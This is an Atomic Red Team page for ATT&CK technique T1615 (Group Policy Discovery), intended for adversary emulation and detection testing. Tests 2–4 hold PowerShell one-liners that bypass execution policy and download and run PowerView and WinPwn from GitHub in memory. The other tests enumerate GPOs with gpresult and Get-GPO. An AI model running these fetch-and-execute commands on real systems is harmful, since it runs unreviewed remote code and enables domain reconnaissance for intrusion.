Skip to content
Atomic Red Team
atomics
T1615

T1615 - Group Policy Discovery

Description from ATT&CK (opens in a new tab)

Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path \<DOMAIN>\SYSVOL\<DOMAIN>\Policies\.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)

Adversaries may use commands such as gpresult or various publicly available PowerShell functions, such as Get-DomainGPO and Get-DomainGPOLocalGroup, to gather information on Group Policy settings.(Citation: Microsoft gpresult)(Citation: Github PowerShell Empire) Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. Domain or Tenant Policy Modification (opens in a new tab)) for their benefit.

Atomic Tests


Atomic Test #1 - Display group policy information via gpresult

Uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information for a remote user and computer The /z parameter displays all available information about Group Policy. More parameters can be found in the linked Microsoft documentation https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult (opens in a new tab) https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/ (opens in a new tab) Turla has used the /z and /v parameters: https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf (opens in a new tab)

Supported Platforms: Windows

auto_generated_guid: 0976990f-53b1-4d3f-a185-6df5be429d3b

Attack Commands: Run with command_prompt!

gpresult /z


Atomic Test #2 - Get-DomainGPO to display group policy information via PowerView

Use PowerView to Get-DomainGPO This will only work on Windows 10 Enterprise and A DC Windows 2019.

Supported Platforms: Windows

auto_generated_guid: 4e524c4e-0e02-49aa-8df5-93f3f7959b9f

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://github.com/BC-SECURITY/Empire/blob/86921fbbf4945441e2f9d9e7712c5a6e96eed0f3/empire/server/data/module_source/situational_awareness/network/powerview.ps1'); Get-DomainGPO"


Atomic Test #3 - WinPwn - GPOAudit

Check domain Group policies for common misconfigurations using Grouper2 via GPOAudit function of WinPwn

Supported Platforms: Windows

auto_generated_guid: bc25c04b-841e-4965-855f-d1f645d7ab73

Attack Commands: Run with powershell!

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
GPOAudit -noninteractive -consoleoutput


Atomic Test #4 - WinPwn - GPORemoteAccessPolicy

Enumerate remote access policies through group policy using GPORemoteAccessPolicy function of WinPwn

Supported Platforms: Windows

auto_generated_guid: 7230d01a-0a72-4bd5-9d7f-c6d472bc6a59

Attack Commands: Run with powershell!

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
GPORemoteAccessPolicy -consoleoutput -noninteractive


Atomic Test #5 - MSFT Get-GPO Cmdlet

The Get-GPO cmdlet gets one Group Policy Object (GPO) or all the GPOs in a domain. Tested on Windows Server 2019 as a domain user with computer joined to domain. Reference: https://docs.microsoft.com/en-us/powershell/module/grouppolicy/get-gpo?view=windowsserver2022-ps (opens in a new tab)

Supported Platforms: Windows

auto_generated_guid: 52778a8f-a10b-41a4-9eae-52ddb74072bf

Inputs:

NameDescriptionTypeDefault Value
gpo_outputThe output of the Get-GPO cmdletstring$env:temp\GPO_Output.txt
gpo_paramYou can specify a GPO by its display name or by its globally unique identifier (GUID) to get a single GPO, or you can get all the GPOs in the domain through the All parameterstring-All

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

Get-GPO -Domain $ENV:userdnsdomain #{gpo_param} >> #{gpo_output}

Cleanup Commands:

del $env:temp\GPO_Output.txt -erroraction silentlycontinue

Dependencies: Run with powershell!

Description: Add Rsat.ActiveDirectory.DS
Check Prereq Commands:
if(Get-WindowsCapability -Online -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0 | Where-Object { $_.State -eq 'Installed' }){ exit 0 } else { exit 1 }
Get Prereq Commands:
Add-WindowsCapability -online -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0
Description: Add Rsat.GroupPolicy.Management.Tools ###Two RSAT Modules needed for this to work on Win10, WinServer 2019 works by default. This will take a long time (almost 2 minutes) to install RSAT Manually###.
Check Prereq Commands:
if(Get-WindowsCapability -Online -Name Rsat.GroupPolicy.Management.Tools~~~~0.0.1.0 | Where-Object { $_.State -eq 'Installed' }){ exit 0 } else { exit 1 }
Get Prereq Commands:
Add-WindowsCapability -online -Name Rsat.GroupPolicy.Management.Tools~~~~0.0.1.0